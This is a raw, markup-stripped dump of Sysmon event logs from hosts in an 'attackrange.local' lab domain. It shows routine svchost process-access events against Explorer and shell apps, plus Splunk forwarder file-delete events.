Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0D2260DB8B0B4F6B26B1C4B205F7EBA7,SHA256=D71758010BA59709D18FE428F2E223C20567C54493855CEE86F25A3351510622,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806607Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:08.897{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D37CD4BF404957FCB66A04BD7A2473D4,SHA256=75E7FCA93DC8CFA8220ED45116BF8BCAE0FFD4ADB20F9DB464213B9BBECB4A63,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046950Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:08.520{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F07C1E9892DDDAF2115E0697F5B9224B,SHA256=3084A2432E1042D67D2529054B0EAB514B045A5396BF554B9C6F78206380C94D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001046949Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:08.388{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046948Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:08.388{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046947Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:08.388{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046946Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:08.388{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046945Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:08.388{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046944Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:08.388{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046943Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:08.388{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046942Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:08.388{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046941Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:08.388{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046940Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:08.388{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046939Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:08.388{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046938Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:08.388{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046937Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:08.388{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046936Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:08.388{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046935Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:08.388{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046934Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:08.388{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046933Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:08.388{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046932Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:08.387{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046931Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:08.387{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046930Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:08.387{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046929Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:08.387{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046928Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:08.387{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046927Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:08.387{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046926Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:08.387{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046925Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:08.387{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046924Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:08.386{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046923Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:08.386{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046922Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:08.386{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046921Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:08.386{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046920Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:08.386{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046919Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:08.386{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 